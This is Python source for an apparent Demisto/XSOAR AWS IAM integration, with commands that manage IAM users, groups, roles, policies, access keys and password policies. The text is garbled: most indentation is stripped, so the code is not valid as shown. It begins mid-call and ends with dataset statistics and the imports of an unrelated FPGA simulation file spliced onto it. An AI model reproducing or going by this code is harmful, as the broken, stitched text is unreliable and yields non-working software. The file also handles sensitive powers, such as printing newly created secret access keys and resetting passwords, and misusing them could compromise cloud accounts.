roleArn=args.get('roleArn'),
roleSessionName=args.get('roleSessionName'),
roleSessionDuration=args.get('roleSessionDuration'),
)
response = client.get_user(UserName=args.get('userName'))
user = response['User']
data = ({
'UserName': user['UserName'],
'UserId': user['UserId'],
'Arn': user['Arn'],
'CreateDate': datetime.strftime(user['CreateDate'], '%Y-%m-%dT%H:%M:%S'),
'Path': user['Path'],
})
ec = {'AWS.IAM.Users': data}
human_readable = tableToMarkdown('AWS IAM Users', data)
return_outputs(human_readable, ec)
def list_users(args):
client = aws_session(
roleArn=args.get('roleArn'),
roleSessionName=args.get('roleSessionName'),
roleSessionDuration=args.get('roleSessionDuration'),
)
data = []
paginator = client.get_paginator('list_users')
for response in paginator.paginate():
for user in response['Users']:
data.append({
'UserName': user['UserName'],
'UserId': user['UserId'],
'Arn': user['Arn'],
'CreateDate': datetime.strftime(user['CreateDate'], '%Y-%m-%d %H:%M:%S'),
'Path': user['Path'],
})
ec = {'AWS.IAM.Users': data}
human_readable = tableToMarkdown('AWS IAM Users', data)
return_outputs(human_readable, ec)
def update_user(args):
client = aws_session(
roleArn=args.get('roleArn'),
roleSessionName=args.get('roleSessionName'),
roleSessionDuration=args.get('roleSessionDuration'),
)
kwargs = {'UserName': args.get('oldUserName')}
if args.get('newUserName'):
kwargs.update({'NewUserName': args.get('newUserName')})
if args.get('newPath'):
kwargs.update({'NewPath': args.get('newPath')})
response = client.update_user(**kwargs)
if response['ResponseMetadata']['HTTPStatusCode'] == 200:
demisto.results(
"Changed UserName {0} To: {1}".format(args.get('oldUserName'), args.get('newUserName')))
def delete_user(args):
client = aws_session(
roleArn=args.get('roleArn'),
roleSessionName=args.get('roleSessionName'),
roleSessionDuration=args.get('roleSessionDuration'),
)
response = client.delete_user(UserName=args.get('userName'))
if response['ResponseMetadata']['HTTPStatusCode'] == 200:
demisto.results('The User {0} has been deleted'.format(args.get('userName')))
def update_login_profile(args):
client = aws_session(
roleArn=args.get('roleArn'),
roleSessionName=args.get('roleSessionName'),
roleSessionDuration=args.get('roleSessionDuration'),
)
response = client.update_login_profile(
Password=args.get('newPassword'),
UserName=args.get('userName'),
PasswordResetRequired=True if args.get('passwordResetRequired') == 'True' else False
)
if response['ResponseMetadata']['HTTPStatusCode'] == 200:
demisto.results("The user {0} Password was changed".format(args.get('userName')))
def create_group(args):
client = aws_session(
roleArn=args.get('roleArn'),
roleSessionName=args.get('roleSessionName'),
roleSessionDuration=args.get('roleSessionDuration'),
)
kwargs = {'GroupName': args.get('groupName')}
if args.get('path') is not None:
kwargs.update({'Path': args.get('path')})
response = client.create_group(**kwargs)
group = response['Group']
data = ({
'GroupName': group['GroupName'],
'GroupId': group['GroupId'],
'Arn': group['Arn'],
'CreateDate': datetime.strftime(group['CreateDate'], '%Y-%m-%dT%H:%M:%S'),
'Path': group['Path'],
})
ec = {'AWS.IAM.Groups': data}
human_readable = tableToMarkdown('AWS IAM Groups', data)
return_outputs(human_readable, ec)
def list_groups(args):
client = aws_session(
roleArn=args.get('roleArn'),
roleSessionName=args.get('roleSessionName'),
roleSessionDuration=args.get('roleSessionDuration'),
)
data = []
paginator = client.get_paginator('list_groups')
for response in paginator.paginate():
for group in response['Groups']:
data.append({
'GroupName': group['GroupName'],
'GroupId': group['GroupId'],
'Arn': group['Arn'],
'CreateDate': datetime.strftime(group['CreateDate'], '%Y-%m-%dT%H:%M:%S'),
'Path': group['Path'],
})
ec = {'AWS.IAM.Groups': data}
human_readable = tableToMarkdown('AWS IAM Groups', data)
return_outputs(human_readable, ec)
def list_groups_for_user(args):
client = aws_session(
roleArn=args.get('roleArn'),
roleSessionName=args.get('roleSessionName'),
roleSessionDuration=args.get('roleSessionDuration'),
)
data = []
response = client.list_groups_for_user(UserName=args.get('userName'))
for group in response['Groups']:
data.append({
'UserName': args.get('userName'),
'GroupName': group['GroupName'],
'GroupId': group['GroupId'],
'Arn': group['Arn'],
'CreateDate': datetime.strftime(group['CreateDate'], '%Y-%m-%dT%H:%M:%S'),
'Path': group['Path'],
})
ec = {'AWS.IAM.Users(val.UserName === obj.UserName).Groups': data}
human_readable = tableToMarkdown('AWS IAM User Groups', data)
return_outputs(human_readable, ec)
def add_user_to_group(args):
client = aws_session(
roleArn=args.get('roleArn'),
roleSessionName=args.get('roleSessionName'),
roleSessionDuration=args.get('roleSessionDuration'),
)
response = client.add_user_to_group(
GroupName=args.get('groupName'),
UserName=args.get('userName')
)
if response['ResponseMetadata']['HTTPStatusCode'] == 200:
demisto.results("The user {0} was added to the IAM group: {1}".format(args.get('userName'),
args.get(
'groupName')))
def create_access_key(args):
client = aws_session(
roleArn=args.get('roleArn'),
roleSessionName=args.get('roleSessionName'),
roleSessionDuration=args.get('roleSessionDuration'),
)
response = client.create_access_key(UserName=args.get('userName'))
AccessKey = response['AccessKey']
data = ({
'UserName': AccessKey['UserName'],
'AccessKeyId': AccessKey['AccessKeyId'],
'SecretAccessKey': AccessKey['SecretAccessKey'],
'Status': AccessKey['Status'],
'CreateDate': datetime.strftime(AccessKey['CreateDate'], '%Y-%m-%dT%H:%M:%S')
})
ec = {'AWS.IAM.Users(val.UserName === obj.UserName).AccessKeys': data}
human_readable = tableToMarkdown('AWS IAM Users', data)
return_outputs(human_readable, ec)
def update_access_key(args):
client = aws_session(
roleArn=args.get('roleArn'),
roleSessionName=args.get('roleSessionName'),
roleSessionDuration=args.get('roleSessionDuration'),
)
response = client.update_access_key(
UserName=args.get('userName'),
AccessKeyId=args.get('accessKeyId'),
Status=args.get('status')
)
if response['ResponseMetadata']['HTTPStatusCode'] == 200:
demisto.results(
"Access Key with ID {0} was set to status: {1}".format(args.get('accessKeyId'),
args.get('status')))
def list_access_key_for_user(args):
client = aws_session(
roleArn=args.get('roleArn'),
roleSessionName=args.get('roleSessionName'),
roleSessionDuration=args.get('roleSessionDuration'),
)
data = []
response = client.list_access_keys(UserName=args.get('userName'))
for accesskey in response['AccessKeyMetadata']:
data.append({
'UserName': accesskey['UserName'],
'AccessKeyId': accesskey['AccessKeyId'],
'Status': accesskey['Status'],
'CreateDate': datetime.strftime(accesskey['CreateDate'], '%Y-%m-%dT%H:%M:%S')
})
ec = {'AWS.IAM.Users(val.UserName === obj.UserName).AccessKeys': data}
human_readable = tableToMarkdown('AWS IAM Users Access Keys', data)
return_outputs(human_readable, ec)
def list_policies(args):
client = aws_session(
roleArn=args.get('roleArn'),
roleSessionName=args.get('roleSessionName'),
roleSessionDuration=args.get('roleSessionDuration'),
)
data = []
response = client.list_policies(
Scope=args.get('scope'),
OnlyAttached=True if args.get('onlyAttached') == 'True' else False
)
for policy in response['Policies']:
data.append({
'PolicyName': policy['PolicyName'],
'PolicyId': policy['PolicyId'],
'Arn': policy['Arn'],
'Path': policy['Path'],
'DefaultVersionId': policy['DefaultVersionId'],
'IsAttachable': policy['IsAttachable'],
'AttachmentCount': policy['AttachmentCount'],
'CreateDate': datetime.strftime(policy['CreateDate'], '%Y-%m-%dT%H:%M:%S'),
'UpdateDate': datetime.strftime(policy['UpdateDate'], '%Y-%m-%dT%H:%M:%S'),
})
ec = {'AWS.IAM.Policies': data}
human_readable = tableToMarkdown('AWS IAM Policies', data)
return_outputs(human_readable, ec)
def list_roles(args):
client = aws_session(
roleArn=args.get('roleArn'),
roleSessionName=args.get('roleSessionName'),
roleSessionDuration=args.get('roleSessionDuration'),
)
data = []
output = []
paginator = client.get_paginator('list_roles')
for response in paginator.paginate():
for role in response['Roles']:
data.append({
'RoleName': role['RoleName'],
'RoleId': role['RoleId'],
'Arn': role['Arn'],
'CreateDate': datetime.strftime(role['CreateDate'], '%Y-%m-%dT%H:%M:%S'),
'Path': role['Path'],
})
output.append(role)
raw = json.loads(json.dumps(output, cls=DatetimeEncoder))
ec = {'AWS.IAM.Roles': raw}
human_readable = tableToMarkdown('AWS IAM Roles', data)
return_outputs(human_readable, ec)
def attach_policy(args):
client = aws_session(
roleArn=args.get('roleArn'),
roleSessionName=args.get('roleSessionName'),
roleSessionDuration=args.get('roleSessionDuration'),
)
if args.get('type') == 'User':
response = client.attach_user_policy(
UserName=args.get('entityName'),
PolicyArn=args.get('policyArn')
)
if args.get('type') == 'Group':
response = client.attach_group_policy(
GroupName=args.get('entityName'),
PolicyArn=args.get('policyArn')
)
if args.get('type') == 'Role':
response = client.attach_role_policy(
RoleName=args.get('entityName'),
PolicyArn=args.get('policyArn')
)
if response['ResponseMetadata']['HTTPStatusCode'] == 200:
demisto.results(
"Policy was attached to {0}: {1} ".format(args.get('type'), args.get('entityName')))
def detach_policy(args):
client = aws_session(
roleArn=args.get('roleArn'),
roleSessionName=args.get('roleSessionName'),
roleSessionDuration=args.get('roleSessionDuration'),
)
if args.get('type') == 'User':
response = client.detach_user_policy(
UserName=args.get('entityName'),
PolicyArn=args.get('policyArn')
)
if args.get('type') == 'Group':
response = client.detach_group_policy(
GroupName=args.get('entityName'),
PolicyArn=args.get('policyArn')
)
if args.get('type') == 'Role':
response = client.detach_role_policy(
RoleName=args.get('entityName'),
PolicyArn=args.get('policyArn')
)
if response['ResponseMetadata']['HTTPStatusCode'] == 200:
demisto.results(
"Policy was detached from {0}: {1} ".format(args.get('type'), args.get('entityName')))
def delete_login_profile(args):
client = aws_session(
roleArn=args.get('roleArn'),
roleSessionName=args.get('roleSessionName'),
roleSessionDuration=args.get('roleSessionDuration'),
)
response = client.delete_login_profile(UserName=args.get('userName'))
if response['ResponseMetadata']['HTTPStatusCode'] == 200:
demisto.results("The user {0} login profile has been deleted".format(args.get('userName')))
def delete_group(args):
client = aws_session(
roleArn=args.get('roleArn'),
roleSessionName=args.get('roleSessionName'),
roleSessionDuration=args.get('roleSessionDuration'),
)
response = client.delete_group(GroupName=args.get('groupName'))
if response['ResponseMetadata']['HTTPStatusCode'] == 200:
demisto.results("The Group {0} has been deleted".format(args.get('groupName')))
def remove_user_from_group(args):
client = aws_session(
roleArn=args.get('roleArn'),
roleSessionName=args.get('roleSessionName'),
roleSessionDuration=args.get('roleSessionDuration'),
)
response = client.remove_user_from_group(
GroupName=args.get('groupName'),
UserName=args.get('userName')
)
if response['ResponseMetadata']['HTTPStatusCode'] == 200:
demisto.results(
"The User {0} has been removed from the group {1}".format(args.get('userName'),
args.get('groupName')))
def delete_access_key(args):
client = aws_session(
roleArn=args.get('roleArn'),
roleSessionName=args.get('roleSessionName'),
roleSessionDuration=args.get('roleSessionDuration'),
)
kwargs = {
'UserName': args.get('userName'),
'AccessKeyId': args.get('AccessKeyId')
}
response = client.delete_access_key(**kwargs)
if response['ResponseMetadata']['HTTPStatusCode'] == 200:
demisto.results("The Access Key was deleted")
def create_instance_profile(args):
client = aws_session(
roleArn=args.get('roleArn'),
roleSessionName=args.get('roleSessionName'),
roleSessionDuration=args.get('roleSessionDuration'),
)
kwargs = {'InstanceProfileName': args.get('instanceProfileName')}
if args.get('path') is not None:
kwargs.update({'Path': args.get('path')})
response = client.create_instance_profile(**kwargs)
instanceProfile = response['InstanceProfile']
data = ({
'Path': instanceProfile['Path'],
'InstanceProfileName': instanceProfile['InstanceProfileName'],
        'InstanceProfileId': instanceProfile['InstanceProfileId'],
'Arn': instanceProfile['Arn'],
'CreateDate': datetime.strftime(instanceProfile['CreateDate'], '%Y-%m-%dT%H:%M:%S'),
})
ec = {'AWS.IAM.InstanceProfiles': data}
human_readable = tableToMarkdown('AWS IAM InstanceProfile', data)
return_outputs(human_readable, ec)
def delete_instance_profile(args):
client = aws_session(
roleArn=args.get('roleArn'),
roleSessionName=args.get('roleSessionName'),
roleSessionDuration=args.get('roleSessionDuration'),
)
response = client.delete_instance_profile(InstanceProfileName=args.get('instanceProfileName'))
if response['ResponseMetadata']['HTTPStatusCode'] == 200:
demisto.results(
"The InstanceProfile: {0} was deleted".format(args.get('instanceProfileName')))
def list_instance_profiles(args):
client = aws_session(
roleArn=args.get('roleArn'),
roleSessionName=args.get('roleSessionName'),
roleSessionDuration=args.get('roleSessionDuration'),
)
output = []
data = []
paginator = client.get_paginator('list_instance_profiles')
for response in paginator.paginate():
for instanceProfile in response['InstanceProfiles']:
data.append({
'Path': instanceProfile['Path'],
'InstanceProfileName': instanceProfile['InstanceProfileName'],
'InstanceProfileId': instanceProfile['InstanceProfileId'],
'CreateDate': datetime.strftime(instanceProfile['CreateDate'], '%Y-%m-%dT%H:%M:%S'),
})
output.append(instanceProfile)
raw = json.loads(json.dumps(output, cls=DatetimeEncoder))
ec = {'AWS.IAM.InstanceProfiles': raw}
human_readable = tableToMarkdown('AWS IAM Instance Profiles', data)
return_outputs(human_readable, ec)
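# --- Illustrative sketch (assumption, not part of the original integration) ---
# The list_* commands above all share a paginate-and-collect shape; a single
# helper could gather every page from a boto3 paginator:
def _collect_pages_sketch(client, operation, result_key, **paginate_kwargs):
    # Collect every page of `result_key` items into one list.
    items = []
    for page in client.get_paginator(operation).paginate(**paginate_kwargs):
        items.extend(page[result_key])
    return items
# e.g. _collect_pages_sketch(client, 'list_roles', 'Roles')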
def add_role_to_instance_profile(args):
client = aws_session(
roleArn=args.get('roleArn'),
roleSessionName=args.get('roleSessionName'),
roleSessionDuration=args.get('roleSessionDuration'),
)
kwargs = {
'InstanceProfileName': args.get('instanceProfileName'),
'RoleName': args.get('roleName')
}
response = client.add_role_to_instance_profile(**kwargs)
if response['ResponseMetadata']['HTTPStatusCode'] == 200:
demisto.results(
"The Role: {0} was added to the Instance Profile: {1}".format(args.get('roleName'),
args.get('instanceProfileName'))
)
def remove_role_from_instance_profile(args):
client = aws_session(
roleArn=args.get('roleArn'),
roleSessionName=args.get('roleSessionName'),
roleSessionDuration=args.get('roleSessionDuration'),
)
kwargs = {
'InstanceProfileName': args.get('instanceProfileName'),
'RoleName': args.get('roleName')
}
response = client.remove_role_from_instance_profile(**kwargs)
if response['ResponseMetadata']['HTTPStatusCode'] == 200:
demisto.results(
"The Role: {0} was removed from the Instance Profile: {1}".format(args.get('roleName'),
args.get(
'instanceProfileName')))
def list_instance_profiles_for_role(args):
client = aws_session(
roleArn=args.get('roleArn'),
roleSessionName=args.get('roleSessionName'),
roleSessionDuration=args.get('roleSessionDuration'),
)
output = []
data = []
paginator = client.get_paginator('list_instance_profiles_for_role')
for response in paginator.paginate(RoleName=args.get('roleName')):
for instanceProfile in response['InstanceProfiles']:
data.append({
'Path': instanceProfile['Path'],
'InstanceProfileName': instanceProfile['InstanceProfileName'],
'InstanceProfileId': instanceProfile['InstanceProfileId'],
'CreateDate': datetime.strftime(instanceProfile['CreateDate'], '%Y-%m-%dT%H:%M:%S'),
'Arn': instanceProfile['Arn'],
})
output.append(instanceProfile)
    # Serialize the accumulated list, not just the last profile of the loop.
    raw = json.loads(json.dumps(output, cls=DatetimeEncoder))
ec = {'AWS.IAM.InstanceProfiles': raw}
human_readable = tableToMarkdown('AWS IAM Instance Profiles', data)
return_outputs(human_readable, ec)
def get_instance_profile(args):
client = aws_session(
roleArn=args.get('roleArn'),
roleSessionName=args.get('roleSessionName'),
roleSessionDuration=args.get('roleSessionDuration'),
)
response = client.get_instance_profile(InstanceProfileName=args.get('instanceProfileName'))
instanceProfile = response['InstanceProfile']
data = ({
'Path': instanceProfile['Path'],
'InstanceProfileName': instanceProfile['InstanceProfileName'],
'InstanceProfileId': instanceProfile['InstanceProfileId'],
'CreateDate': datetime.strftime(instanceProfile['CreateDate'], '%Y-%m-%dT%H:%M:%S'),
})
raw = json.loads(json.dumps(instanceProfile, cls=DatetimeEncoder))
ec = {'AWS.IAM.InstanceProfiles': raw}
human_readable = tableToMarkdown('AWS IAM Instance Profiles', data)
return_outputs(human_readable, ec)
def get_role(args):
client = aws_session(
roleArn=args.get('roleArn'),
roleSessionName=args.get('roleSessionName'),
roleSessionDuration=args.get('roleSessionDuration'),
)
response = client.get_role(RoleName=args.get('roleName'))
role = response['Role']
data = ({
'RoleName': role['RoleName'],
'RoleId': role['RoleId'],
'Arn': role['Arn'],
'CreateDate': datetime.strftime(role['CreateDate'], '%Y-%m-%dT%H:%M:%S'),
'Path': role['Path'],
})
raw = json.loads(json.dumps(response['Role'], cls=DatetimeEncoder))
ec = {'AWS.IAM.Roles': raw}
human_readable = tableToMarkdown('AWS IAM Roles', data)
return_outputs(human_readable, ec)
def delete_role(args):
client = aws_session(
roleArn=args.get('roleArn'),
roleSessionName=args.get('roleSessionName'),
roleSessionDuration=args.get('roleSessionDuration'),
)
response = client.delete_role(RoleName=args.get('roleName'))
if response['ResponseMetadata']['HTTPStatusCode'] == 200:
demisto.results("The Role: {0} was deleted".format(args.get('roleName')))
def create_role(args):
client = aws_session(
roleArn=args.get('roleArn'),
roleSessionName=args.get('roleSessionName'),
roleSessionDuration=args.get('roleSessionDuration'),
)
kwargs = {
'RoleName': args.get('roleName'),
'AssumeRolePolicyDocument': json.dumps(json.loads(args.get('assumeRolePolicyDocument')))
}
if args.get('path') is not None:
kwargs.update({'Path': args.get('path')})
if args.get('description') is not None:
kwargs.update({'Description': args.get('description')})
if args.get('maxSessionDuration') is not None:
kwargs.update({'MaxSessionDuration': int(args.get('maxSessionDuration'))})
# return kwargs
response = client.create_role(**kwargs)
role = response['Role']
data = ({
'RoleName': role['RoleName'],
'RoleId': role['RoleId'],
'Arn': role['Arn'],
'Path': role['Path'],
})
raw = json.loads(json.dumps(response['Role'], cls=DatetimeEncoder))
ec = {'AWS.IAM.Roles': raw}
human_readable = tableToMarkdown('AWS IAM Roles', data)
return_outputs(human_readable, ec)
def create_policy(args):
client = aws_session(
roleArn=args.get('roleArn'),
roleSessionName=args.get('roleSessionName'),
roleSessionDuration=args.get('roleSessionDuration'),
)
kwargs = {
'PolicyName': args.get('policyName'),
'PolicyDocument': json.dumps(json.loads(args.get('policyDocument')))
}
if args.get('path') is not None:
kwargs.update({'Path': args.get('path')})
if args.get('description') is not None:
kwargs.update({'Description': args.get('description')})
response = client.create_policy(**kwargs)
policy = response['Policy']
data = ({
'PolicyName': policy['PolicyName'],
'PolicyId': policy['PolicyId'],
'Arn': policy['Arn'],
'Path': policy['Path'],
'CreateDate': datetime.strftime(policy['CreateDate'], '%Y-%m-%dT%H:%M:%S'),
})
raw = json.loads(json.dumps(response['Policy'], cls=DatetimeEncoder))
ec = {'AWS.IAM.Policies': raw}
human_readable = tableToMarkdown('AWS IAM Policies', data)
return_outputs(human_readable, ec)
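# Note (explanatory comment, not original code): the json.dumps(json.loads(...))
# round trip used for PolicyDocument above both validates that the supplied
# document is well-formed JSON (a ValueError surfaces otherwise) and
# re-serializes it into the canonical string form the IAM API expects.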
def delete_policy(args):
client = aws_session(
roleArn=args.get('roleArn'),
roleSessionName=args.get('roleSessionName'),
roleSessionDuration=args.get('roleSessionDuration'),
)
response = client.delete_policy(PolicyArn=args.get('policyArn'))
if response['ResponseMetadata']['HTTPStatusCode'] == 200:
demisto.results("The Policy: {0} was deleted".format(args.get('policyArn')))
def create_policy_version(args):
client = aws_session(
roleArn=args.get('roleArn'),
roleSessionName=args.get('roleSessionName'),
roleSessionDuration=args.get('roleSessionDuration'),
)
kwargs = {
'PolicyArn': args.get('policyArn'),
'PolicyDocument': json.dumps(json.loads(args.get('policyDocument')))
}
if args.get('setAsDefault') is not None:
kwargs.update({'SetAsDefault': True if args.get('setAsDefault') == 'True' else False})
response = client.create_policy_version(**kwargs)
policy = response['PolicyVersion']
data = ({
'PolicyArn': args.get('policyArn'),
'VersionId': policy['VersionId'],
'IsDefaultVersion': policy['IsDefaultVersion'],
'CreateDate': datetime.strftime(policy['CreateDate'], '%Y-%m-%dT%H:%M:%S'),
})
ec = {'AWS.IAM.Policies(val.PolicyArn === obj.PolicyArn).Versions': data}
human_readable = tableToMarkdown('New AWS IAM Policy Version', data)
return_outputs(human_readable, ec)
def delete_policy_version(args):
client = aws_session(
roleArn=args.get('roleArn'),
roleSessionName=args.get('roleSessionName'),
roleSessionDuration=args.get('roleSessionDuration'),
)
kwargs = {
'PolicyArn': args.get('policyArn'),
'VersionId': args.get('versionId')
}
response = client.delete_policy_version(**kwargs)
if response['ResponseMetadata']['HTTPStatusCode'] == 200:
demisto.results("The Policy Version was deleted")
def list_policy_versions(args):
client = aws_session(
roleArn=args.get('roleArn'),
roleSessionName=args.get('roleSessionName'),
roleSessionDuration=args.get('roleSessionDuration'),
)
data = []
response = client.list_policy_versions(PolicyArn=args.get('policyArn'))
for version in response['Versions']:
data.append({
'PolicyArn': args.get('policyArn'),
'VersionId': version['VersionId'],
'IsDefaultVersion': version['IsDefaultVersion'],
'CreateDate': datetime.strftime(version['CreateDate'], '%Y-%m-%dT%H:%M:%S'),
})
ec = {'AWS.IAM.Policies(val.PolicyArn === obj.PolicyArn).Versions': data}
human_readable = tableToMarkdown('AWS IAM Policy Versions', data)
return_outputs(human_readable, ec)
def get_policy_version(args):
client = aws_session(
roleArn=args.get('roleArn'),
roleSessionName=args.get('roleSessionName'),
roleSessionDuration=args.get('roleSessionDuration'),
)
data = []
kwargs = {
'PolicyArn': args.get('policyArn'),
'VersionId': args.get('versionId')
}
response = client.get_policy_version(**kwargs)
version = response['PolicyVersion']
data.append({
'PolicyArn': args.get('policyArn'),
'Document': version['Document'],
'VersionId': version['VersionId'],
'IsDefaultVersion': version['IsDefaultVersion'],
'CreateDate': datetime.strftime(version['CreateDate'], '%Y-%m-%dT%H:%M:%S'),
})
ec = {'AWS.IAM.Policies(val.PolicyArn === obj.PolicyArn).Versions': data}
human_readable = tableToMarkdown('AWS IAM Policy Version', data)
return_outputs(human_readable, ec)
def set_default_policy_version(args):
client = aws_session(
roleArn=args.get('roleArn'),
roleSessionName=args.get('roleSessionName'),
roleSessionDuration=args.get('roleSessionDuration'),
)
kwargs = {
'PolicyArn': args.get('policyArn'),
'VersionId': args.get('versionId')
}
response = client.set_default_policy_version(**kwargs)
if response['ResponseMetadata']['HTTPStatusCode'] == 200:
demisto.results("The Default Policy Version was set to {0}".format(args.get('versionId')))
def create_account_alias(args):
client = aws_session(
roleArn=args.get('roleArn'),
roleSessionName=args.get('roleSessionName'),
roleSessionDuration=args.get('roleSessionDuration'),
)
kwargs = {'AccountAlias': args.get('accountAlias')}
response = client.create_account_alias(**kwargs)
if response['ResponseMetadata']['HTTPStatusCode'] == 200:
demisto.results("The Account Alias was created")
def delete_account_alias(args):
client = aws_session(
roleArn=args.get('roleArn'),
roleSessionName=args.get('roleSessionName'),
roleSessionDuration=args.get('roleSessionDuration'),
)
kwargs = {'AccountAlias': args.get('accountAlias')}
response = client.delete_account_alias(**kwargs)
if response['ResponseMetadata']['HTTPStatusCode'] == 200:
demisto.results("The Account Alias was deleted")
def get_account_password_policy(args):
client = aws_session(
roleArn=args.get('roleArn'),
roleSessionName=args.get('roleSessionName'),
roleSessionDuration=args.get('roleSessionDuration'),
)
response = client.get_account_password_policy()
data = response['PasswordPolicy']
raw = json.loads(json.dumps(response['PasswordPolicy'], cls=DatetimeEncoder))
ec = {'AWS.IAM.PasswordPolicy': raw}
human_readable = tableToMarkdown('AWS IAM Account Password Policy', data)
return_outputs(human_readable, ec)
def update_account_password_policy(args):
client = aws_session(
roleArn=args.get('roleArn'),
roleSessionName=args.get('roleSessionName'),
roleSessionDuration=args.get('roleSessionDuration'),
)
try:
response = client.get_account_password_policy()
kwargs = response['PasswordPolicy']
except client.exceptions.NoSuchEntityException:
kwargs = {}
# ExpirePasswords is part of the response but cannot be included
# in the request
if 'ExpirePasswords' in kwargs:
kwargs.pop('ExpirePasswords')
if args.get('minimumPasswordLength'):
kwargs.update({'MinimumPasswordLength': int(args.get('minimumPasswordLength'))})
if args.get('requireSymbols'):
kwargs.update({'RequireSymbols': True if args.get('requireSymbols') == 'True' else False})
if args.get('requireNumbers'):
kwargs.update({'RequireNumbers': True if args.get('requireNumbers') == 'True' else False})
if args.get('requireUppercaseCharacters'):
kwargs.update(
{'RequireUppercaseCharacters': True if args.get('requireUppercaseCharacters') == 'True' else False})
if args.get('requireLowercaseCharacters'):
kwargs.update(
{'RequireLowercaseCharacters': True if args.get('requireLowercaseCharacters') == 'True' else False})
if args.get('allowUsersToChangePassword'):
kwargs.update(
{'AllowUsersToChangePassword': True if args.get('allowUsersToChangePassword') == 'True' else False})
if args.get('maxPasswordAge'):
kwargs.update({'MaxPasswordAge': int(args.get('maxPasswordAge'))})
if args.get('passwordReusePrevention'):
kwargs.update({'PasswordReusePrevention': int(args.get('passwordReusePrevention'))})
if args.get('hardExpiry'):
kwargs.update({'HardExpiry': True if args.get('hardExpiry') == 'True' else False})
response = client.update_account_password_policy(**kwargs)
if response['ResponseMetadata']['HTTPStatusCode'] == 200:
demisto.results("The Account Password Policy was updated")
def test_function():
client = aws_session()
response = client.list_users()
if response['ResponseMetadata']['HTTPStatusCode'] == 200:
demisto.results('ok')
'''EXECUTION BLOCK'''
try:
LOG('Command being called is {command}'.format(command=demisto.command()))
if demisto.command() == 'test-module':
test_function()
elif demisto.command() == 'aws-iam-create-user':
create_user(demisto.args())
elif demisto.command() == 'aws-iam-create-login-profile':
create_login_profile(demisto.args())
elif demisto.command() == 'aws-iam-get-user':
get_user(demisto.args())
elif demisto.command() == 'aws-iam-list-users':
list_users(demisto.args())
elif demisto.command() == 'aws-iam-update-user':
update_user(demisto.args())
elif demisto.command() == 'aws-iam-delete-user':
delete_user(demisto.args())
elif demisto.command() == 'aws-iam-update-login-profile':
update_login_profile(demisto.args())
elif demisto.command() == 'aws-iam-create-group':
create_group(demisto.args())
elif demisto.command() == 'aws-iam-list-groups':
list_groups(demisto.args())
elif demisto.command() == 'aws-iam-list-groups-for-user':
list_groups_for_user(demisto.args())
elif demisto.command() == 'aws-iam-create-access-key':
create_access_key(demisto.args())
elif demisto.command() == 'aws-iam-update-access-key':
update_access_key(demisto.args())
elif demisto.command() == 'aws-iam-list-access-keys-for-user':
list_access_key_for_user(demisto.args())
elif demisto.command() == 'aws-iam-list-policies':
list_policies(demisto.args())
elif demisto.command() == 'aws-iam-list-roles':
list_roles(demisto.args())
elif demisto.command() == 'aws-iam-attach-policy':
attach_policy(demisto.args())
elif demisto.command() == 'aws-iam-detach-policy':
detach_policy(demisto.args())
elif demisto.command() == 'aws-iam-delete-login-profile':
delete_login_profile(demisto.args())
elif demisto.command() == 'aws-iam-add-user-to-group':
add_user_to_group(demisto.args())
elif demisto.command() == 'aws-iam-delete-group':
delete_group(demisto.args())
elif demisto.command() == 'aws-iam-remove-user-from-group':
remove_user_from_group(demisto.args())
elif demisto.command() == 'aws-iam-delete-access-key':
delete_access_key(demisto.args())
elif demisto.command() == 'aws-iam-create-instance-profile':
create_instance_profile(demisto.args())
elif demisto.command() == 'aws-iam-delete-instance-profile':
delete_instance_profile(demisto.args())
elif demisto.command() == 'aws-iam-list-instance-profiles':
list_instance_profiles(demisto.args())
elif demisto.command() == 'aws-iam-add-role-to-instance-profile':
add_role_to_instance_profile(demisto.args())
elif demisto.command() == 'aws-iam-remove-role-from-instance-profile':
remove_role_from_instance_profile(demisto.args())
elif demisto.command() == 'aws-iam-list-instance-profiles-for-role':
list_instance_profiles_for_role(demisto.args())
elif demisto.command() == 'aws-iam-get-instance-profile':
get_instance_profile(demisto.args())
elif demisto.command() == 'aws-iam-get-role':
get_role(demisto.args())
elif demisto.command() == 'aws-iam-delete-role':
delete_role(demisto.args())
elif demisto.command() == 'aws-iam-create-role':
create_role(demisto.args())
elif demisto.command() == 'aws-iam-create-policy':
create_policy(demisto.args())
elif demisto.command() == 'aws-iam-delete-policy':
delete_policy(demisto.args())
elif demisto.command() == 'aws-iam-create-policy-version':
create_policy_version(demisto.args())
elif demisto.command() == 'aws-iam-delete-policy-version':
delete_policy_version(demisto.args())
elif demisto.command() == 'aws-iam-list-policy-versions':
list_policy_versions(demisto.args())
elif demisto.command() == 'aws-iam-get-policy-version':
get_policy_version(demisto.args())
elif demisto.command() == 'aws-iam-set-default-policy-version':
set_default_policy_version(demisto.args())
elif demisto.command() == 'aws-iam-create-account-alias':
create_account_alias(demisto.args())
elif demisto.command() == 'aws-iam-delete-account-alias':
delete_account_alias(demisto.args())
elif demisto.command() == 'aws-iam-get-account-password-policy':
get_account_password_policy(demisto.args())
elif demisto.command() == 'aws-iam-update-account-password-policy':
update_account_password_policy(demisto.args())
except ResponseParserError as e:
    # Log first; return_error terminates execution, so a LOG call after it
    # would never run.
    LOG(str(e))
    return_error(
        'Could not connect to the AWS endpoint. Please check that the region is valid.\n {error}'.format(
            error=type(e)))
except Exception as e:
LOG(str(e))
return_error('Error has occurred in the AWS IAM Integration: {code}\n {message}'.format(
code=type(e), message=str(e)))
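# --- Illustrative sketch (assumption, not part of the original integration) ---
# The long if/elif chain above could be replaced with a command table, e.g.:
#
#     COMMANDS = {
#         'aws-iam-create-user': create_user,
#         'aws-iam-get-user': get_user,
#         # ... one entry per aws-iam-* command ...
#     }
#     handler = COMMANDS.get(demisto.command())
#     if handler is not None:
#         handler(demisto.args())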
| 38.467498 | 112 | 0.633649 |
77cfe2e4a2c9b478300944f02fc01b445e2a3d79 | 10,648 | py | Python | bundle/fpga_simu.py | davidbrochart/bundle | 9e6a14fa48e4d22a2cbc8239b13e600a86c5e5b0 | [
"MIT"
] | 4 | 2018-09-15T08:30:14.000Z | 2019-03-11T20:56:25.000Z | bundle/fpga_simu.py | davidbrochart/bundle | 9e6a14fa48e4d22a2cbc8239b13e600a86c5e5b0 | [
"MIT"
] | null | null | null | bundle/fpga_simu.py | davidbrochart/bundle | 9e6a14fa48e4d22a2cbc8239b13e600a86c5e5b0 | [
"MIT"
] | 1 | 2022-03-14T02:01:16.000Z | 2022-03-14T02:01:16.000Z | from pyclk import Sig, Reg, In, Out, List, Module
from .memory import memory
from .ddr2fpga import ddr2fpga
from .fpga2ddr import fpga2ddr
from .iterator import iterator
from .functions import func
from .fpga_state import FPGA_state
from random import randint
import asyncio
